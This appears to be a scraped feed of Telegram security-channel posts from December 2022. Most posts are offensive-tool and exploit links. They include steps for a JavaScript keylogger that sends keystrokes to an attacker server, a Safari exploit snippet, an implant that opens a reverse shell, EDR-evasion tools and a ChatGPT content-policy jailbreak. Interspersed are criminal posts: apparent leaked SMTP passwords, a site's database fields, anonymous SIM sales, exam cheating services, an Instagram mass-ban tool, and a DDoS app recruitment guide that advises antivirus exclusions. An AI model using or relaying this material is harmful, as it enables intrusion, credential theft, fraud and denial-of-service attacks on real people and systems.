Hello, my rabbits who like to go to tea parties 🐰☕️While I am writing about bitcoin nodes search and analysis, I decided to make a collection of rootkit malware on linux🐧Reverse💊Not really about linux, but still a very cool guide to reverse ; Article about reverse-engineering the Ebpfkit rootkit ;Article about dovecat and hy4 malware analysis for Linux ;A collection of resources for reverse-engineering Linux ; Article about virus analysis aromatization on linux ;Article about malware analysis for Linux ;Article about rootkit and its detection ;Resources🗝A site with material on viruses and rootkits on linux, including their writing ; A site with resources on reversal ; A resource site for people who want to write viruses for linux ;A site with excellent material and documents about linux malware ;Examples of malware 🦠A github thread with cool virus repositories ;Linux X86_64 ELF virus ;A simple linux virus. It can get root rights and destroy your system ;Linux ransomware ;Repository of the source code of various Linux malware ;Combination of shell and rootkit ;Collection of Linux rootkits ; A simple Linux kernel rootkit ;MateriaLs / Collections📖A collection of linux virus materials ;A collection of materiałs on rootkits and attacks on linux ;Article about evading malware analysis by reverse engineering ;Malware analysis methodology in Linux environment ;An article for understanding Linux malware ;Not a bad article about writing rootkits on linux ;Malware Scanners 🧲LMD malware scanner for Linux ;Linux rootkit scanner ;A github thread with collections of Linux rootkit scanners ;Also a good rootkit scanner ;As you can see, although it is widely accepted that "writing viruses on linux is difficult, or even impossible practice", it is far from it, and that you have linux is not yet a silver bullet against viruses On linux, viruses (especially rootkits) are written and very successfullySo take care and protect your systemThank you for reading ❤️And Alice, don't forget to read the sign on the back of the bottle you want to drink, in case it says "poison"🧪🎀#malware #virus #revers #ransomware #attacks #linux #exploit #rootkit
2022-12-23 14:52:41
🔥🔥🔥The GOAD’s writeups series end with this part. 💥GOAD - part 12 - TrustsThis post will be on escalation with domain trust (from child to parent domain) and on Forest to Forest trust lateral move.
2022-12-23 14:33:14
2022-12-22 16:05:24
​​Hacking & Cybersecurity class materialsWe are delighted to announce a first on Lawfare: A live online class on hacking and cybersecurity.
2022-12-22 16:05:23
​​USB NinjaUSB Ninja is an information security and penetration testing tool that looks and functions just like a regular USB cable (both power and data) until a wireless remote control triggers it to deliver your choice of attack payload to the host machine. In essence, USB Ninja is the next step in the evolution of BadUSB, embedding the attack in the USB cable itself.Emulating keyboard and mouse actions, payloads can be completely customized and can be highly targeted. Undetectable by firewalls, AV software (depending on payload of course) or visual inspection, the USB Ninja is an ideal tool for penetration testers, police and government.Wireless trigger device for the USB Ninja. Can trigger two different payloads via toggle buttons. Accepts RP-SMA antennas if you want greater distances for remote payload triggering. Documentation: online:🛒 Cable🛒 Bluetooth Remote #badusb #cable
2022-12-22 16:02:36
​​Golden NuggetsBurp Suite Extension to easily create Wordlists based off URI, URI Parameters and Single Words (Minus the Domain)
2022-12-22 16:02:35
​​MSI ShenanigansThis repository contains Proof of Concept code and harmless weaponised packages representing various weaponisation strategies that Threat Actors abuse in Windows Installer MSI format. Shenanigans. Part 1 – Offensive Capabilities Overview:
2022-12-22 16:02:34
​​plutionPrototype pollution scanner using headless chrome
2022-12-22 16:01:37
​​SquarePhishSquarePhish is an advanced phishing tool that uses a technique combining the OAuth Device code authentication flow and QR codes.
2022-12-22 16:01:36
​​Copilot, for your terminalA CLI tool that generates shell scripts from a human readable description.
2022-12-22 14:38:34
​​chatgpt_chinese_prompt_hackUse prompt hack to bypass OpenAI's content policy restrictions by golfzert
2022-12-22 14:09:01
2022-12-22 05:51:16
#exploit1. CVE-2022-48870:maccms admin+ xss attacks CVE-2022-39253:Docker host file read
2022-12-22 05:51:15
#WebApp_SecurityWeb Attack Cheat Sheet
2022-12-22 05:51:14
#Offensive_securityDumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk, plus functions and strings obfuscation, duplicate lsass handle from existed processes
2022-12-21 17:24:04
2022-12-21 15:28:02
#exploit1. CVE-2022-47518, CVE-2022-47519, CVE-2022-47520, CVE-2022-47521:Remote DoS in Linux kernel WILC1000 wireless driver CVE-2022-2602:io_uring kernel exploit Directory Traversal Vulnerability in Huawei HG255s Products
2022-12-21 15:28:01
#Threat_Research#Cloud_Security1. Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cg Elastic IP Hijacking - A New Attack Vector in AWS
2022-12-21 15:27:46
#Blue_Team_TechniquesIncident Response Methodologies 2022 EN/ES/FR/RU Versions
2022-12-21 15:27:45
#AnalyticsTop 10 most exploited vulnerabilities in 20221. CVE-2022-30190: MS Office "Follina"2. CVE-2021-44228: Apache Log4Shell3. CVE-2022-22965: Spring4Shell4. CVE-2022-1388: F5 BIG-IP5. CVE-2022-0609: Google Chrome zero-day CVE-2017-11882: Old but not forgotten - MS Office bug7. CVE-2022-41082, CVE-2022-41040: ProxyNotShell8. CVE-2022-27925, CVE-2022-41352: Zimbra Collaboration Suite bugs9. CVE-2022-26134: Atlassian Confluence RCE flaw 10. CVE-2022-30525: Zyxel RCE vulnerability
2022-12-21 14:46:53
2022-12-21 13:45:30
💥OWASSRF: CrowdStrike Identifies New Exploit Method for Exchange Bypassing ProxyNotShell MitigationsCrowdStrike recently discovered a new exploit method (called OWASSRF) consisting of CVE-2022-41080 and CVE-2022-41082 to achieve remote code execution (RCE) through Outlook Web Access (OWA). The new exploit method bypasses URL rewrite mitigations for the Autodiscover endpoint provided by Microsoft in response to ProxyNotShell.After initial access via this new exploit method, the threat actor leveraged legitimate Plink and AnyDesk executables to maintain access, and performed anti-forensics techniques on the Microsoft Exchange server in an attempt to hide their activity.
2022-12-21 13:45:29
💥Home Grown Red Team: Let’s Make Some Malware In C: Part 3This post is going to be all about the dll!
2022-12-21 13:45:25
🔥CVE-2022-2602 Exploit using inode locking technique.📕DirtyCred: Escalating Privilege in Linux Kernel🔖Blog posts: DirtyCred Remastered: how to turn an UAF into Privilege EscalationCVE-2022-2602: DirtyCred File Exploitation applied on an io_uring UAF
2022-12-21 13:45:15
|CVE-2022-2602 Kernel Exploit|🔥The vulnerability is an UAF that impacts the registered file descriptor functionality in the io_uring subsystem. It's possible to register a file in the io_uring context, free it from the Unix Garbage Collector(GC) and re-use it with the requested io_uring operation (for example, a writev operation). To exploit the bug, it was a matter of replace the freed file structure with a read-only file (e.g. /etc/passwd), in order to write into it, and achieve a good timing with a small race window.
2022-12-21 13:45:14
🔥Deconstructing and Exploiting CVE-2020-6418 (exploit here)This vulnerability lies in the V8 engine of Google Chrome, namely its optimizing compiler Turbofan. Specifically, the vulnerable version is in Google Chrome’s V8 prior to 80.0.3987.122. In this article, Daniel Toh Jing En will give a step-by-step analysis of the vulnerability, from the root cause to exploitation.
2022-12-21 13:45:12
|FORCEDENTRY, ты тут?|🕵️‍♂️Думаю, что многие не забыли про сделавший много шума год назад data-only 0-click RCE сплойт FORCEDENTRY(CVE-2021-30860, integer overflow в JBIG2 реализации для xpdf в Apple (JBIG2Stream::readTextRegionSeg(), посредством программирования JBIG2 weird machine в парсере), что относится к CoreGraphics по сути) через iMessage от NSO Group. То есть прилетает тебе PDF файл, который якобы ".gif" и за счет того, что IMTranscoderAgent анализировал как раз такого рода самозванцев за пределами BlastDoor песочницы, израильтяне могли достичь SBX. В действительности эксплуатация была намного сложнее и можно почитать подробнее: на канале, тут и тут.Причем исследователи из Google Project Zero не смогли установить точный след после IMTranscoderAgent SBX и как предположение выдвинули несколько сценариев эксплуатации:1️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ iOS kernel LPE2️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ some_service ➡️ iOS kernel LPEПроблема для безопасников и по сей день стоит в том, что в публичном доступе до сих пор нет сэмплов(отсюда можем сделать вывод, что стандартными методами детектить не выйдет). В этом посте Мэтта помимо разбора атаки идет речь и о детектировании без испльзования регулярок или проверок имени процесса, в конечном итоге был представлен инструмент(ELEGANTBOUNCER) для анализа файлов non-fileless(data-only) атаки, причем не основываясь на сэмплах. 🔖Более подробно можно почитать в статье Мэтта.🕵️‍♂️I think that many have not forgotten about the FORCEDENTRY exploit that made a lot of noise a year ago (CVE-2021-30860, integer overflow in the JBIG2 implementation for xpdf in Apple (JBIG2Stream::readTextRegionSeg(), by programming the JBIG2 weird machine in the parser), which refers to CoreGraphics in fact) via iMessage from NSO Group. That is, a PDF file arrives to you, which is allegedly ".gif" and due to the fact that IMTranscoderAgent analyzed just such impostors outside the BlastDoor sandbox, the Israelis could achieve SBX. In fact, the operation was much more complicated and you can read more: a on the channel, here and here.Moreover, researchers from Google Project Zero were unable to establish an exact trace after IMTranscoderAgent SBX and, as an assumption, put forward several operating scenarios:1️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ iOS kernel LPE2️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ some_service ➡️ iOS kernel LPEThe problem for security guards to this day is that there are still no samples in the public domain (from here we can conclude that it will not be possible to detect using standard methods). In this post by Matt, in addition to analyzing the attack, we are talking about detecting without using regular expressions or checking the process name, eventually a tool for analyzing non-fileless(data-only) attack files was introduced, and not based on samples(ELEGANTBOUNCER). 🔖You can read more in Matt's article.#NSO #PegasusSpyware #FORCEDENTRY #iOS #iMessage #forensics #security #expoitation #sbx #xpdf #weirdMachine #JBIG2
2022-12-21 13:44:10
💥In-Memory Execution in macOS: the Old and the NewAs part of our work, it’s often interesting to try to find possible avenues of attack that bypass detections on EDR products. On macOS, EDR products specifically collect telemetry from fork and exec syscalls. macOS has alternative ways of executing code, which side-step these system calls by executing code directly in-memory.In this writeup, we touch on all 3 aforementioned APIs and then create a PoC loader which uses NSCreateObjectFileImageFromFile and CFBundleCreate to load a bundle from disk and execute it.
2022-12-20 14:41:31
2022-12-20 07:07:12
2022-12-20 06:47:15
2022-12-20 06:32:26
2022-12-20 05:02:57
🔥Linux Kernel: Exploiting a Netfilter UAF in kmalloc-cgWe describe a method to exploit a UAF in the Linux kernel when objects are allocated in a specific slab cache, namely the kmalloc-cg series of SLUB caches used for cgroups. This vulnerability is assigned CVE-2022-32250 and exists in Linux kernel versions 5.18.1 and prior.
2022-12-20 05:02:33
🔥🔥🔥Type confusion vulnerability(CVE-2022-42823) exists in the Apple Safari JSC Inspector(Root Cause Analysis + PoC).A Type confusion vulnerability exists in the Apple Safari JSC Inspector. This issue causes Memory Corruption due to Type confusion. A victim must open an arbitrary generated HTML file to trigger this vulnerability.PoC:<script> let object = {}; Object.prototype.__defineSetter__('type', function() { object.x = {}; object[0] = object.x; });</script>🛡Fixed in: macOS 13, tvOS 16.1, iOS 16.1 & iPadOS 16, Safari 16.1, watchOS 9.1.
2022-12-20 04:54:25
​​ZoneAlarmEoPExploit for Arbitrary File Move vulnerability in ZoneAlarm AV
2022-12-20 03:11:03
#Red_Team_Tactics1. Blindside: A New Technique for EDR Evasion with Hardware Breakpoints Raw sockets hacking]-> Secure shell using port Knocking technique with AES256-GCM:
2022-12-20 03:11:02
#tools#Offensive_security1. Shennina - Automating Host Exploitation with AI AMSI-bypass obfuscation + ETW-block obfuscation + powershell command obfuscation
2022-12-20 03:11:01
#Infographics"VT Intelligence Cheat Sheet", 2022.
2022-12-20 03:10:59
#Analytics#Malware_analysis1. Ransomware Business Models: Future Pivots and Trends SentinelSneak: Malicious PyPI module poses as security software development kit
2022-12-19 17:58:10
Heartbleed vulnerability exploited🩸▪️ #github #soft #Heartbleed
2022-12-19 17:58:09
CrimeFlare - This tool can help you to see the real IP behind CloudFlare protected websites.
2022-12-19 17:56:52
🟥10k🔠 non stop Post uploading soon this Last month Happy💻 cyber security intelligent 💻
2022-12-19 17:37:56
2022-12-19 17:37:55
2022-12-19 17:37:54
2022-12-19 17:32:03
Wi-Fi SurveyorVisualize Wi-Fi signal strength over a geographic area.
2022-12-19 17:20:19
#Threat_ResearchEntryBleed: Breaking KASLR under KPTI with Prefetch (CVE-2022-4543)]->
2022-12-19 16:35:24
|Exploit Notes|📑Exploit Notes github repoSticky notes for pentesting. Search hacking techniques and tools for penetration testings, bug bounty, CTF.💾File Upload Attack💾Java Pentesting💾RE with Rizin💾Android Pentesting💾Pug Pentesting💾PE Analysis💾RE💾IMINT and GEOINT💾32-bit ARM Assembly💾OSINT💾x86 Assembly💾Malware Analysis💾BOF Attack
2022-12-19 16:35:03
🔥🔥🔥MeshyJSON: A TP-Link tdpServer JSON Stack OverflowThis blog post describes a vulnerability found and exploited in November 2022 by NCC Group. The target was the TP-Link AX1800 WiFi 6 Router (Archer AX21). It was running hardware version 3.6 and firmware version 1.1.1 (Archer AX21(US)_V3.6_1.1.1 Build 20220603). The vulnerability was patched on 2nd of December 2022 with firmware version 1.1.3 (Archer AX21(US)_V3.6_1.1.3 Build 20221125).
2022-12-19 16:34:34
|Offensive Security Cheatsheet|Document used to centralize many informations about cybersecurity techniques and payloads.💾OSINT💾Web Pentest💾Network💾Shells methods💾Windows Systems💾Linux Systems💾Other Systems💾Passcracking Hash & Files💾Phishing, RedTeam and SE💾Wireless💾Cryptography💾Pwn💾Defensive, Monitoring, CTI...💾External Resources
2022-12-19 16:33:24
🔥Wanderer is an open-source program that collects information about running processes. This information includes the integrity level, the presence of the AMSI as a loaded module, whether it is running as 64-bit or 32-bit as well as the privilege level of the current process. This information is extremely helpful when building payloads catered to the ideal candidate for process injection.
2022-12-19 16:06:54
​BlueTeam.LabThis project contains a set of Terraform and Ansible scripts to create an orchestrated BlueTeam Lab. The goal of this project is to provide the red and blue teams with the ability to deploy an ad-hoc detection lab to test various attacks and forensic artifacts on the latest Windows environment and then to get a 'SOC-like' view into generated data. #techniques #cybersecurity #infosec
2022-12-19 14:12:22
2022-12-19 10:18:19
Application Security Engineer, БанкЗП: 130-200 тыс.руб. netЛокация: Москва, КраснодарФормат работы: удаленно/офисЧем предстоит заниматься:- Внедрение, настройка и поддержка WAF, реагирование на атаки;- Проведение анализа безопасности разрабатываемого программного обеспечения и его архитектуры, выявление уязвимостей;- Формирование требований безопасности в проектной деятельности Банка;- Осуществление контроля устранение обнаруженных уязвимостей.Мы ожидаем от кандидата: - Опыт настройки и внедрения систем класса web application firewall (WAF); - Знание и понимание OWASP Top 10, применимых методологий, стандартов и практик в области безопасной разработки; - Понимание принципов работы современных веб-приложений (XML-RPC, REST, SOAP, SOP, CORS, HSTS, CSP, OAuth2, и др.); - Знание OS Linux на уровне администратора. - Понимание принципов защиты веб-приложений и умение исправлять найденные уязвимости на архитектурном уровне;Большим преимуществом будет: - Знание SQL, базовые навыки работы в различных СУБД; - Базовые навыки программирования на каком либо языке (python, php, go и т.п.).Контакт: @alya_988‌‌Translation: ru-enApplication Security Engineer, BankSalary: 130-200 thousand rubles. netLocation: Moscow, KrasnodarWork format: remotely/officeWhat is to be done:- Implementation, configuration and support of WAF, response to attacks;- Conducting a security analysis of the developed software and its architecture, identifying vulnerabilities;- Formation of security requirements in the Bank's project activities;- Monitoring the elimination of detected vulnerabilities.We expect from the candidate: - Experience in setting up and implementing web application firewall (WAF) class systems; - Knowledge and understanding of OWASP Top 10, applicable methodologies, standards and practices in the field of secure development; - Understanding the principles of modern web applications (XML-RPC, REST, SOAP, SOP, CORS, HSTS, CSP, OAuth2, etc.); - Knowledge of OS Linux at the administrator level. - Understanding the principles of protecting web applications and the ability to fix vulnerabilities found at the architectural level;The big advantage will be: - Knowledge of SQL, basic skills in various DBMS; - Basic programming skills in any language (python, php, go, etc.).Contact: @alya_988‌‌
2022-12-19 05:28:33
💥Ban-R•Features:~Reports Time Delay To Secure Your Acc~Temp Ban & Permanent Ban ~Fully Safe & Accessible~Works Without Proxies ~Anti Virtual Machine •Use 2013 Insta Accounts For Fast BanningDownload Link: Click Here 👈Password: #CyberRatsBanRBy Cyber_Rats ❤️
2022-12-19 03:09:18
#tools#Offensive_security1. Venom - library that meant to perform evasive communication using stolen browser socket Pingoor - Linux Backdoor based on ICMP protocol
2022-12-19 03:09:17
#Malware_analysis1. Munin - Online hash checker for Virustotal and other services Hunting for Attestation Signed Malware
2022-12-18 14:32:32
2022-12-18 13:39:14
🔥Venom is a C++ library that is meant to give an alternative way to communicate, instead of creating a socket that could be traced back to the process, it creates a new "hidden" (there is no window shown) detached edge process (edge was chosen because it is a browser that is installed on every Windows 10+ and won't raise suspicious) and stealing one of its sockets to perform the network operations.The benefit of creating a detached browser process is that there is no danger that it will be closed accidentally by the user and the sockets exist but not communicating with any site, therefore avoiding possible collisions.
2022-12-18 13:02:21
#tools#Offensive_security1. A simple ptrace-less shared library injector for x64 Linux EDRs Hooked APIs
2022-12-18 10:59:51
#exploit1. CVE-2022-41050:A vulnerability in the MS Windows' User-Mode Printer Drivers CVE-2022-46689:macOS Dirty Cow bug
2022-12-18 10:59:50
#Research"First, Do No Harm: Studying the manipulation of security headers in browser extensions", 2021.]-> Fast JavaScript parser:
2022-12-18 10:59:49
#Malware_analysis1. VidarStealer analysis Monster Libra (TA551/Shathak) pushes IcedID (Bokbot) with Dark VNC/Cobalt Strike
2022-12-18 09:26:11
Linux Hacking ToolsNessus– this tool can be used for Ubuntu hack, scan configuration settings, patches, and networks etc. it can be found at This tool can be used to monitor hosts that are running on the server and the services that they are utilizing. It can also be used to scan for ports. It can be found at – SARA is the acronym for Security Auditor’s Research Assistant. As the name implies, this tool can be used to audit networks against threats such as SQL Injection, XSS etc. it can be found at above list is not exhaustive; it gives you an idea of the tools available for Ubuntu hacking and hacking Linux systems.
2022-12-18 03:01:24
💉linux_injector is a simple ptrace-less shared library injector for x64 Linux(Most Linuxes that use glibc should be supported).For control flow hijacking, this program needs a hijacking candidate. The code presented here uses malloc(), this can be changed by editing FUN_NAME and recompiling. Make sure the hooked function can run under 100ms, so that it won't be overwritten while it executes. This means calls like sleep or wait are bad candidates for the initial shellcode. The function in question also needs to be more than 0x50 long for the shellcode not to overwrite other functions.Usage:linux_injector <pid> <module>Where pid is target process id & module is a module to inject, will be dlopened in the remote process ⚠️The code expects that the target uses the same libc as available to us. If it does not, then the remote symbols won't be found. This could be fixed by reading the remote libraries and scanning for our symbols in them.
2022-12-18 03:01:23
💥MacDirtyCowDemo#macOS #XNU #vulnerability #exploitation #security #DirtyCOW #MacDirtyCow #root #su
2022-12-17 16:29:16
New mini shell :)⚠️ Bypass All waf📌 Non Encoded :::)))
2022-12-17 15:45:08
⚠️Anyone who wants cyber security intelligent program hacking  related post can make me admin on their channel or group.  Post uploading will be done only in the channel group above 500 over subscribers. ⚠️ @hayper007 ⚠️
2022-12-17 13:18:13
2022-12-17 05:17:05
#Threat_Research1. Unusual Cache Poisoning between Akamai and S3 buckets HTTP Request Smuggling Due to Incorrect Parsing of Multi-line Transfer-Encoding
2022-12-17 05:17:04
#exploit1. CVE-2022-28672:Foxit PDF Reader - UaF RCE Exploit]-> CVE-2022-45451:Acronis Cyber Protect/Home Cyber Protect - Arbitrary File Read
2022-12-17 02:35:20
2022-12-17 02:27:11
🔥PingPlant is a Linux implant PoC that starts a custom listener for ICMP data, and parses the ethernet frame to check for a special payload.If this payload is found, it will then initiate a callback to a defined IP. Even though I have this connect back with a reverse shell, you could edit this to have it execute anything on the infected system when the special payload is received. Features:💾Runtime process renaming💾No listening ports💾Written in Go, so almost all AV's will never pick this up
2022-12-17 02:27:10
🔥Win32k User-Mode Printer Drivers StartDoc UAF(PoC included)A vulnerability(CVE-2022-41050) in the way BoundClipRGNToSurface merges surfaces allows attackers to trigger a UAF due to a function that frees the used data and then access it. If the memory where the freed memory is properly prepared, the attacker can control the crash and cause it to execute arbitrary code.
2022-12-17 02:27:09
🛡Akamai’s Perspective on December’s Patch Tuesday 2022In this report, we’ll assess how critical the vulnerabilities really are and how commonplace the affected applications and services are, and we’ll provide a realistic perspective on the bugs that were fixed.🛡December 2022 Patch Tuesday: 10 Critical CVEs, One Zero-Day, One Under Active Attack(crowdstrike)🛡Microsoft Patch Tuesday for December 2022 — Snort rules and prominent vulnerabilities(talos intelligence)🛡The December 2022 Security Update Review(ZDI)🛡Microsoft’s December 2022 Patch Tuesday Addresses 48 CVEs(tenable)🛡Microsoft Patch Tuesday, December 2022 Edition(KrebsonSecurity)🛡Patch Tuesday - December 2022(rapid7)
2022-12-16 15:05:00
2022-12-16 13:45:20
На Source Zero Con 2022 представили данный инструмент. Если кратко: кидаете скомпилированный бинарь, тулза из бинаря убирает известные IoC строки, подписывает сертом из другого бинаря, ну и помогает EDR обходить (за счёт увеличения размера файла) #pentest #bypass
2022-12-16 13:45:19
🔥String Obfuscation The Malware Way - blog postWhile this technique is not as secure as encryption, it can still be useful for malware authors who want to avoid detection by simple string analysis and other static analysis techniques. Not encrypting or encoding the strings will also help avoid entropy-based detections.💥MurkyStrings is a string obfuscator for .NET applications, built to evade static string analysis. It does not rely on encryption or encoding to evade entropy-based detections. Instead, it transforms strings into a murky mess by inserting special characters and random words. Removing them again on runtime.Usage:MurkyStrings.exe <file path> [--mode=<mode>]Available modes:💾replace[glyph] - Insert a variety of homoglyph characters that look identical to alphabetical characters💾replace[simple] - Insert random amounts of a special character in between all actual characters💾combine[glyph] - Combines remove and replace[glyph]💾combine[simple] - Combines remove and replace[simple]
2022-12-16 13:45:15
🔓Defeating Windows ASLR via low-entropy shared libraries in 2 hoursAs it was demonstrated in this article, ASLR implementation on Windows has important nuances and in some situation can introduce additional risk for an application, especially if the target is a 32-bit program or it is linked with a library which was compiled without /HIGHENTROPYVA and /LARGEADDRESSAWARE flags. While the best solution would be to have per-execution randomization as it is done in Linux and modern MacOS, the good decision would be to move away from 32-bit to 64-bit applications and avoid linkage with shared libraries compiled without /HIGHENTROPYVA and /LARGEADDRESSAWARE flags. This would help to significantly increase complexity of an attack.
2022-12-16 13:45:14
⌨️Javascript Keylogger can come handy in case you are able to access only DOM/JS of a website and want to get naughty.Usage:💾change url variable in keylogger.js to url address where keylogger.php is located💾load keylogger.js in the DOM of the attacked application💾put keylogger.php and data.txt to your server where you have data write access (don't forget to set pertinent file privileges).💥Profit! You're done, just let the victim come to attacked website with JS allowed in the browser and type something.
2022-12-16 13:45:12
🔥CVE-2021-43444 to 43449: Exploiting ONLYOFFICE Web Sockets for Unauthenticated RCE.
2022-12-16 13:45:11
🔥🔥🔥Foxit PDF Reader UAF RCE Exploit JIT Spraying(CVE-2022-28672) - blog post.This research shows that if Foxit Reader had been compiled with CFG support, the discovered bug would have been more difficult to exploit. However, the lack of CFG support allowed the attacker to use JIT spraying to bypass existing mitigations such as ASLR and DEP. This highlights the importance of using multiple layers of defense to protect against attacks.💥PoC Exploit📺Demo: Foxit PDF Reader RCE Demo - CVE-2022-28672
2022-12-16 11:19:40
2022-12-16 08:06:07
🌐 Cooprudea.comip, ip_long, user_login, user_id, stamp, activity, session_id, country, details, ac_bot, ac_status, ac_by_user email_to, subject, content, sender_name, sender_email, debug_mode, debugging_output, timestamp, status📣
2022-12-16 05:26:08
#Infographics#Offensive_securityDACLs (Active Directory Discretionary Access Control Lists) abuse
2022-12-16 05:26:07
#tools#Red_Team_Tactics1. Talon - password guessing tool that targets the Kerberos/LDAP services within the Windows AD environment Bypass Rails::Html::SafeListSanitizer filtering and perform an XSS attack Tool which can help to get NT AUTHORITY\SYSTEM from arbitrary directory creation bugs
2022-12-16 05:26:06
#cryptographyComparison of Symmetric Encryption Methods
2022-12-16 05:26:05
#tools#Offensive_security1. udhcpc process crash on BusyBox 1.24.2 Signing-key abuse and update exploitation framework A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 12 methods
2022-12-16 05:26:04
#exploit1. CVE-2022-45771:Pwndoc LFI to RCE Discord Image Token Password Grabber Exploit
2022-12-16 05:25:13
#reversing#IoT_SecurityHow to Identify a Microcontroller Model Using Firmware Analysis
2022-12-15 16:06:51
🔥Windows Contacts(примеры использования Windows Contact API ) RCE vuln(CVE-2022-44666)⚠️Проблема(эта уязвимость покрывает не полностью проблему) не до конца исправлена, так что и подробности в виде рецензии от мелкомягких отложена на неопределенный срок!
2022-12-15 16:06:30
🔥You’ve Crossed the Line — Disturbing a Host’s RestAkamai Security Research dove deeply into MS-RPC research this past year. For a protocol that does so much, MS-RPC is largely under-researched, and it can have real-world effects. One of those effects is that vulnerabilities in an RPC interface become exposed. This is what we are focusing on in this blog post: vulnerabilities within the Local Session Manager (LSM) RPC interface. 🔥cve-2022-37973 PoC Exploit 🔥cve-2022-37998 PoC Exploit🧰RPC Toolkit(set of tools, articles, blog posts and links to help security researchers drive their RPC research)
2022-12-15 16:06:09
🔥Dragnmove is a post-exploitaition tool that infects files shared between users in order to move from one system to another. Dragnmove can detect actions like dropping a file into the browser window or attaching a file to an email client. After Dragnmove detects the action, it hooks CreateFile API calls to modify handles.
2022-12-15 15:02:52
2022-12-15 15:02:12
Free SMTP Anil$ Wisecow! Gsw28844$ Fatala1
2022-12-15 14:54:23
50 SMTP free Join VIP now $35 get smtp everyday. SMTP Stock 800+
2022-12-15 13:19:20
71 Python Projects with reference and source code.
2022-12-15 11:27:20
Hazir olun :)
2022-12-15 10:35:44
2022-12-15 03:19:46
Заканчиваем хит-парад маленьких городов Бурштынским городским советом. В архиве стандартно почта. Скоро будут базы. Честно‌‌Translation: ru-enWe finish the hit parade of small towns with the Burshtyn City Council. The archive is standard mail.Bases coming soon. Honestly‌‌
2022-12-15 02:23:58
Sim available without proof all sim reacharged 500/rs 1sim vodafone +91+ delivery charges600/rs 1sim jio +91+ delivery charges35sim Stock available 100% trusted escrow accepted@hayper007
2022-12-14 15:39:13
#Research"DISTDET: A Cost-Effective Distributed Cyber Threat Detection System", 2022.
2022-12-14 15:39:04
#tools#Offensive_security1. Nightly builds of common C# offensive tools Nemo - An offensive Remote Access Tool & Post-Exploitation Framework
2022-12-14 15:39:03
#Fuzzing1. Fuzzing ping(8)… and finding a 24 year old bug Finding JIT Optimizer Bugs using SMT Solvers and Fuzzing Fuzzing the Shield: CVE-2022-24548
2022-12-14 15:25:50
2022-12-14 15:01:23
2022-12-14 09:09:17
I Can Help You To Clear & Give the training & exam solutions on the below certifications1_CEH.2_CEH Practical.3_eJPT.4_eCCPTv2. 5_eWPT. 6_eWPTxv2.7_CRTP. 8_CRTO. 9_OSCP. 10_OSWE.11_OSEP. 12_OSWP. 13_CPENT 14_CHFI15_eCPTxv216_PNPT17_Burpsuite exam Remote Exam Support possible. If anyone needs message me.Lower prices & passing guaranteed!Follow: @examsolutionzWe have added new exam of burpsuite solutions
2022-12-14 04:50:52
🇮🇷 Iranian rap about corrupt actors who are in the position of spiesBased on observations in Iran, there are actors who are willing to sell their homeland for money and spy for other countries.This issue has made the people of Iran very angry with some famous actors.It is expected that the Iranian government will take care of the request of its people and deal seriously with these spies.via "shabzadeh".#Celebrity_2zari #Green_card #Iranian_rap@YourJiniNews
2022-12-14 03:26:31
⚡️disBalancer App FAQWhat is happening⁉️We target Russian propaganda websites and sources that contribute to the Russian invasion of Ukraine. We want to make all the murders and violence caused by Russian military forces STOP. Troops are washing their hands in blood, killing the Ukrainians, both children and civilians. PLEASE, SHARE THE LINK ON THE APP AND LET’S #stopPutin TOGETHER!THE MORE PEOPLE RUN THE APP, THE MORE EFFECTIVE ATTACKS ARE!How to use the app⚫️ Download the file via⚫️ Unzip it ⚫️ Open the disBalancer app and click RUN That's it! You're in the cyber army 💪🏼Update! ‼️We are upgrading server (more resources = more people involved), if you will receive 500 error message or heartbeat error - don't worry, your soft still attacking and working!Minimal system requirements1) To run the application you need to have a .Net runtime version 4.5.2+ (higher version as 4.8 also would fit) If you have problems with restart, the last package Microsoft Visual C++ 2015 2019 Redistributable (x64 x86) will solve it. it possible to use the App on Mac OS or Linux?Our application is currently launched for Windows. Apps for other OS are on the way and will be announced soon. You can install and run the app on Mac OS and Linux using Boot Camp, VMWare, or Parallels Fusion. Antivirus exclusionsTo avoid any runtime problems until the app will be signed: Add the application folder to your antivirus exclusions to avoid blocking task execution, as some antiviruses could detect it as a hacker tool. Adding an application to the firewall exception would be also a good idea. The app isn’t server-based, it’s a simple client, so you don’t need to be aware of the hacking of the exposed web interface and host. Can I use VPN?It’s not required to use VPN to run the app but you can use it to provide your data encryption. VPN services are recommended:https://hackenvpn.comhttps:// to do if the error occurs?Be sure you have installed all required software described in minimal system requirements. In case of any issues with the application, please write #Error in the chat and attach the information.log file. It’s a file located near Disbalancer.exe. How do we know what targets we have? We don’t disclose targets until downtime. Targets that are currently under attack are hidden due to security purposes. After a website is in downtime, we send an inactive link to the disBalancer chat. Can I see the code?Unfortunately, we haven't done that yet due to the beta testing period. There are some things that we can't publish at all as well. For instance, hidden attack mechanics and algorithms, transfer batching, and time synchronization that make it possible to function normally. Can I share websites to make them unusable?Sure! Just send a link to it on our Telegram chat and add the hashtag #NewTarget.disBalancer UKRAINE 🇺🇦Since this chat was created for an English-speaking audience, we ask all Ukrainians to go to this chat for comfortable communication for everyone.Instruction in Ukrainian:
2022-12-13 14:52:51
2022-12-13 03:12:41
#Infographics#Infosec_StandardsTypes of VPN]-> RFC4026: "Provider Provisioned VPN Terminology", 2018.
2022-12-13 03:12:38
#reversing#ResearchBlackHat Europe 2022:"Exploring a New Class of Kernel Exploit Primitive".
2022-12-13 03:12:37
#exploit1. CVE-2022-45025:Command injection via PDF import in Markdown Preview Enhanced (VSCode, Atom) Exploring Chrome’s CVE-2020-6418 CVE-2022-39066:SQL Injection Vulnerability in ZTE MF286R
2022-12-13 03:12:36
#exploit1. ThinkPHP latest RCE reproduction and analysis Folina, Shadow Credentials, and WSUS exploitation CVE-2022-1361:Improper Neutralization of Special Elements Used In a SQL Command: New Technique Discovered To Bypass WAF Of Several Vendors
2022-12-13 03:12:35
#Offensive_security1. A collection of various and sundry code snippets that leverage .NET dynamic tradecraft Payload generator to exfiltrate user cookies through the PHP info page bypassing the HttpOnly flag during XSS exploitation From SQL Injection to RCE on Intel DCM (CVE-2022-21225)
2022-12-13 03:12:34
#compilersCodon - high-performance, zero-overhead, extensible Python compiler using LLVM
2022-12-13 03:12:33
